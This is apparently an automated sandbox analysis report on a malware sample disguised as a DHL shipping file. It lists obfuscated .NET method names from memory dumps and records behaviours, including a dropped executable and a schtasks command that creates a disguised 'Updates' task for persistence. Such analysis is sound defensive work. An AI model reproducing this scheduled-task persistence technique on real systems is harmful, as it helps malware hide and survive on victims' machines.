Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, nvBk4m3G4ZXSrBJYXB.cs | High entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, GqniEswF6biBLm0KlJ.cs | High entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, IvDoetz5KqokI1y0Cn.cs | High entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, bl8h2hPaa2j5IkYyGB.cs | High entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, AJLRIHDDdK562aLaZHO.cs | High entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, qrWO2JXi5BGLtLJQcd.cs | High entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, loRipS4coX6cPlGq2e.cs | High entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, mpSvESuMJVRT0YxIqv.cs | High entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, omVWvpR8jUViqCfHCT.cs | High entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, uGsgAgDPMW45Q6ajTO7.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, G99NcAWGo5fdSa2ZsS.cs | High entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs | High entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, yo0WdWZos0SUx6um5v.cs | High entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, dRPprFJEwfnXi7BZea.cs | High entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, Yc0kDWG1u9wfr9y0I8.cs | High entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, CnHZ4nFFSQNWoh3XZ8.cs | High entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, wFDKFK56TvYPu3IEkr.cs | High entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, lLKHiUlsR6De2UuAF1.cs | High entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, eBMXbAdtYlyGT360Ka.cs | High entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, OcHrdeaLLWK7BX0qEn.cs | High entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, ATQ7dwDXSlfahW1odIE.cs | High entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, hqeXMWDEKGoWC5nrtyW.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, nvBk4m3G4ZXSrBJYXB.cs | High entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, GqniEswF6biBLm0KlJ.cs | High entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, IvDoetz5KqokI1y0Cn.cs | High entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, bl8h2hPaa2j5IkYyGB.cs | High entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, AJLRIHDDdK562aLaZHO.cs | High entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, qrWO2JXi5BGLtLJQcd.cs | High entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, loRipS4coX6cPlGq2e.cs | High entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, mpSvESuMJVRT0YxIqv.cs | High entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, omVWvpR8jUViqCfHCT.cs | High entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, uGsgAgDPMW45Q6ajTO7.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, G99NcAWGo5fdSa2ZsS.cs | High entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs | High entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, yo0WdWZos0SUx6um5v.cs | High entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, dRPprFJEwfnXi7BZea.cs | High entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, Yc0kDWG1u9wfr9y0I8.cs | High entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, CnHZ4nFFSQNWoh3XZ8.csHigh entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, wFDKFK56TvYPu3IEkr.csHigh entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, lLKHiUlsR6De2UuAF1.csHigh entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, eBMXbAdtYlyGT360Ka.csHigh entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, OcHrdeaLLWK7BX0qEn.csHigh entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, ATQ7dwDXSlfahW1odIE.csHigh entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, hqeXMWDEKGoWC5nrtyW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, nvBk4m3G4ZXSrBJYXB.csHigh entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, GqniEswF6biBLm0KlJ.csHigh entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, IvDoetz5KqokI1y0Cn.csHigh entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, bl8h2hPaa2j5IkYyGB.csHigh entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, AJLRIHDDdK562aLaZHO.csHigh entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, qrWO2JXi5BGLtLJQcd.csHigh entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, loRipS4coX6cPlGq2e.csHigh entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, mpSvESuMJVRT0YxIqv.csHigh entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, omVWvpR8jUViqCfHCT.csHigh entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, uGsgAgDPMW45Q6ajTO7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, G99NcAWGo5fdSa2ZsS.csHigh entropy of concatenated method names: 'gL0t93i1S9', 'hJutqn9pUl', 'V95t6WxshQ', 'xXxtKOnHPX', 'yubt2x3D99', 'PCNtbQVh3B', 'M9ttAMAdmZ', 'mqAtaK61Ne', 'bAfturja9P', 'PUXtwtjqkq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.csHigh entropy of concatenated method names: 'tjtph5L6q0', 'p3UpgEE58c', 'sqfpGXexEJ', 'VOOpvQWJUJ', 'DrvpsYfXID', 'lMFpcfflGu', 'zL4ptJtxZj', 'GpIpVh8KJe', 'N1CpyQJwUH', 'Y5rpBefJj4'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, yo0WdWZos0SUx6um5v.csHigh entropy of concatenated method names: 'hZLiBIZJDm', 'ULJiUKK7dJ', 'ToString', 'Q5QigYnDvY', 'niIiGJ5XWs', 'dNjivahrUL', 'qS7isDecoR', 'RLLicyuwex', 'G3Pit7Ab32', 'smYiVBQqxE'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, dRPprFJEwfnXi7BZea.csHigh entropy of concatenated method names: 'dkiTQvDSrHBamW525RN', 'cIOP4wDMN3LOyj6NNtJ', 'U2xcLSxDe8', 'PfYckB3vFC', 'RPncCwhlma', 'TTGX0EDl35ry4mCVcuh', 'PARNMqDs6SPF08yfbJq'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, Yc0kDWG1u9wfr9y0I8.csHigh entropy of concatenated method names: 'Dispose', 'b6cDlPlGq2', 'nEdXJNMUQT', 'LDtOjb7dcn', 'o8BDxY5uq2', 'i9EDzvCgPM', 'ProcessDialogKey', 'kLyXELKHiU', 'hR6XDDe2Uu', 'CF1XXnuujM'
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile created: C:\Users\user\AppData\Roaming\uvbIwIYe.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
